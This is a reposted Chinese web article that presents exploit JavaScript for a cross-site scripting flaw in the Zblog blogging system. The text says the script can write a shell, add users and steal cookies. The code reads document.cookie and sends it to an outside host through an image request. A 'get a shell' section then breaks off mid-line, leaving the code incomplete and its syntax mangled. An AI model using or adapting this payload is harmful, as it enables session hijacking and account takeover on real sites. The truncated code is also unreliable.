当前位置:首页>>Zblog最新跨站漏洞及利用代码

Zblog最新跨站漏洞及利用代码

  • 程序员文章站
  • 2022-07-10 10:34:29

  js里可以写shell,添加用户,偷取cookie然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexof(‘password’)==-1?0:1;

  tolocation=’https://www.jb51.net/’;

  //get cookie

  x=new image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txacontent=

上一篇:phpcms V9 BLind SQL 注入漏洞0day
下一篇:金山毒霸多个sql注入及XSS漏洞和修复

猜你喜欢

网络运营最新文章

网站首页标签版权申明用户隐私联系方式

Copyright © 2021 -2022程序员文章站,粤ICP备20058927号

友情链接:
大家都在搜
php主从配置扁平化h5sql注入java